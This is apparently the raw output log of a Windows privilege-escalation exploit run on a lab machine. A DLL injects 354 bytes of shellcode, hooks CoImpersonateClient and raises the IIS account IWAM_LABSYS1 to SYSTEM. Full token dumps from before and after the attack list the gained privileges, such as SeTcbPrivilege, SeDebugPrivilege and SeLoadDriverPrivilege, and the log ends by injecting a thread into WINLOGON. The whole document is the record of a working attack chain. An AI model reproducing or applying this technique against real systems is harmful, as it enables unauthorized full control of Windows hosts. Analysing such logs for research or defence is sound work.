DLL_PROCESS_ATTACH (0x10000000, 1, 00000000)
Reading shellcode from 0x1000101e
Shellcode is 354 bytes long
Hooking CoImpersonateClient (0x77a9bb64) with shellcode at 0xb2368
DLL_THREAD_ATTACH (0x10000000, 2, 00000000)
DLL_PROCESS_DETACH (0x10000000, 0, 00000000)
DLL_PROCESS_ATTACH (0x10000000, 1, 00000000)
CoImpersonateClient has already been hooked
In HookedCoImpersonateClient
Before: running as IWAM_LABSYS1

PRIMARY PROCESS BEFORE ATTACK
This is a unrestricted token
Token type: primary
Token ID: 0x6a95ec
Authentication ID: 0x696586
Token's owner: MCONOVUSI1\IWAM_LABSYS1 (user)
Token's source: Advapi (0x696582)
Token's user: MCONOVUSI1\IWAM_LABSYS1 (user)
Token's primary group: MCONOVUSI1\None (group)
Default DACL (64 bytes):
  ACE count: 2
  ACE 0:
    Applies to: MCONOVUSI1\IWAM_LABSYS1 (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0x10000000
    Access mode: grant access
  ACE 1:
    Applies to: NT AUTHORITY\SYSTEM (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0x10000000
    Access mode: grant access
Token's privileges (3 total):
  SeIncreaseQuotaPrivilege (0x5) = disabled
  SeChangeNotifyPrivilege (0x17) = [enabled by default]
  SeUndockPrivilege (0x19) = disabled

After executing CoImpersonateClient
After: running as SYSTEM

PRIMARY PROCESS AFTER ATTACK
This is a unrestricted token
Token type: primary
Token ID: 0x6a95ec
Authentication ID: 0x696586
Token's owner: MCONOVUSI1\IWAM_LABSYS1 (user)
Token's source: Advapi (0x696582)
Token's user: MCONOVUSI1\IWAM_LABSYS1 (user)
Token's primary group: MCONOVUSI1\None (group)
Default DACL (64 bytes):
  ACE count: 2
  ACE 0:
    Applies to: MCONOVUSI1\IWAM_LABSYS1 (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0x10000000
    Access mode: grant access
  ACE 1:
    Applies to: NT AUTHORITY\SYSTEM (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0x10000000
    Access mode: grant access
Token's privileges (3 total):
  SeIncreaseQuotaPrivilege (0x5) = disabled
  SeChangeNotifyPrivilege (0x17) = [enabled by default]
  SeUndockPrivilege (0x19) = disabled

Enabling SeAssignPrimaryTokenPrivilege (if present)
Enabling SeIncreaseQuotaPrivilege (if present)
Enabling SeCreateTokenPrivilege (if present)
Enabling SeDebugPrivilege (if present)
Enabling SeMachineAccountPrivilege (if present)
Enabling SeSecurityPrivilege (if present)
Enabling SeTakeOwnershipPrivilege (if present)
Enabling SeTcbPrivilege (if present)

IMPERSONATION THREAD TOKEN BEFORE ADJUSTING PRIVILEGES
This is a unrestricted token
Token type: impersonation
Impersonation level: impersonation
Token ID: 0x6d3a99
Authentication ID: 0x3e7
Token's owner: BUILTIN\Administrators (alias)
Token's source: *SYSTEM* (0x0)
Token's user: NT AUTHORITY\SYSTEM (user)
Token's primary group: NT AUTHORITY\SYSTEM (user)
Default DACL (68 bytes):
  ACE count: 2
  ACE 0:
    Applies to: NT AUTHORITY\SYSTEM (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0x10000000
    Access mode: grant access
  ACE 1:
    Applies to: BUILTIN\Administrators (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0xa0020000
    Access mode: grant access
Token's privileges (14 total):
  SeTcbPrivilege (0x7) = [enabled by default]
  SeUndockPrivilege (0x19) = [enabled]
  SeTakeOwnershipPrivilege (0x9) = [enabled]
  SeCreatePagefilePrivilege (0xf) = [enabled by default]
  SeLockMemoryPrivilege (0x4) = [enabled by default]
  SeSystemtimePrivilege (0xc) = [enabled]
  SeProfileSingleProcessPrivilege (0xd) = [enabled by default]
  SeIncreaseBasePriorityPrivilege (0xe) = [enabled by default]
  SeCreatePermanentPrivilege (0x10) = [enabled by default]
  SeDebugPrivilege (0x14) = [enabled by default]
  SeAuditPrivilege (0x15) = [enabled by default]
  SeSecurityPrivilege (0x8) = [enabled]
  SeLoadDriverPrivilege (0xa) = [enabled]
  SeChangeNotifyPrivilege (0x17) = [enabled by default]

IMPERSONATION THREAD TOKEN AFTER ADJUSTING PRIVILEGES
This is a unrestricted token
Token type: impersonation
Impersonation level: impersonation
Token ID: 0x6d3a99
Authentication ID: 0x3e7
Token's owner: BUILTIN\Administrators (alias)
Token's source: *SYSTEM* (0x0)
Token's user: NT AUTHORITY\SYSTEM (user)
Token's primary group: NT AUTHORITY\SYSTEM (user)
Default DACL (68 bytes):
  ACE count: 2
  ACE 0:
    Applies to: NT AUTHORITY\SYSTEM (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0x10000000
    Access mode: grant access
  ACE 1:
    Applies to: BUILTIN\Administrators (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0xa0020000
    Access mode: grant access
Token's privileges (14 total):
  SeTcbPrivilege (0x7) = [enabled by default]
  SeUndockPrivilege (0x19) = [enabled]
  SeTakeOwnershipPrivilege (0x9) = [enabled]
  SeCreatePagefilePrivilege (0xf) = [enabled by default]
  SeLockMemoryPrivilege (0x4) = [enabled by default]
  SeSystemtimePrivilege (0xc) = [enabled]
  SeProfileSingleProcessPrivilege (0xd) = [enabled by default]
  SeIncreaseBasePriorityPrivilege (0xe) = [enabled by default]
  SeCreatePermanentPrivilege (0x10) = [enabled by default]
  SeDebugPrivilege (0x14) = [enabled by default]
  SeAuditPrivilege (0x15) = [enabled by default]
  SeSecurityPrivilege (0x8) = [enabled]
  SeLoadDriverPrivilege (0xa) = [enabled]
  SeChangeNotifyPrivilege (0x17) = [enabled by default]

PRIMARY THREAD TOKEN AFTER ATTACK
This is a unrestricted token
Token type: primary
Token ID: 0x6d3c81
Authentication ID: 0x3e7
Token's owner: BUILTIN\Administrators (alias)
Token's source: *SYSTEM* (0x0)
Token's user: NT AUTHORITY\SYSTEM (user)
Token's primary group: NT AUTHORITY\SYSTEM (user)
Default DACL (68 bytes):
  ACE count: 2
  ACE 0:
    Applies to: NT AUTHORITY\SYSTEM (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0x10000000
    Access mode: grant access
  ACE 1:
    Applies to: BUILTIN\Administrators (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0xa0020000
    Access mode: grant access
Token's privileges (14 total):
  SeTcbPrivilege (0x7) = [enabled by default]
  SeUndockPrivilege (0x19) = [enabled]
  SeTakeOwnershipPrivilege (0x9) = [enabled]
  SeCreatePagefilePrivilege (0xf) = [enabled by default]
  SeLockMemoryPrivilege (0x4) = [enabled by default]
  SeSystemtimePrivilege (0xc) = [enabled]
  SeProfileSingleProcessPrivilege (0xd) = [enabled by default]
  SeIncreaseBasePriorityPrivilege (0xe) = [enabled by default]
  SeCreatePermanentPrivilege (0x10) = [enabled by default]
  SeDebugPrivilege (0x14) = [enabled by default]
  SeAuditPrivilege (0x15) = [enabled by default]
  SeSecurityPrivilege (0x8) = [enabled]
  SeLoadDriverPrivilege (0xa) = [enabled]
  SeChangeNotifyPrivilege (0x17) = [enabled by default]

PRIMARY PROCES TOKEN AFTER ADJUSTING PRIVILEGES
This is a unrestricted token
Token type: primary
Token ID: 0x6a95ec
Authentication ID: 0x696586
Token's owner: MCONOVUSI1\IWAM_LABSYS1 (user)
Token's source: Advapi (0x696582)
Token's user: MCONOVUSI1\IWAM_LABSYS1 (user)
Token's primary group: MCONOVUSI1\None (group)
Default DACL (64 bytes):
  ACE count: 2
  ACE 0:
    Applies to: MCONOVUSI1\IWAM_LABSYS1 (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0x10000000
    Access mode: grant access
  ACE 1:
    Applies to: NT AUTHORITY\SYSTEM (unknown)
    ACE inherited by: not inheritable
    Access permission mask = 0x10000000
    Access mode: grant access
Token's privileges (3 total):
  SeIncreaseQuotaPrivilege (0x5) = [enabled]
  SeChangeNotifyPrivilege (0x17) = [enabled by default]
  SeUndockPrivilege (0x19) = disabled

Injecting a thread into WINLOGON
DLL_PROCESS_DETACH (0x10000000, 0, 00000001)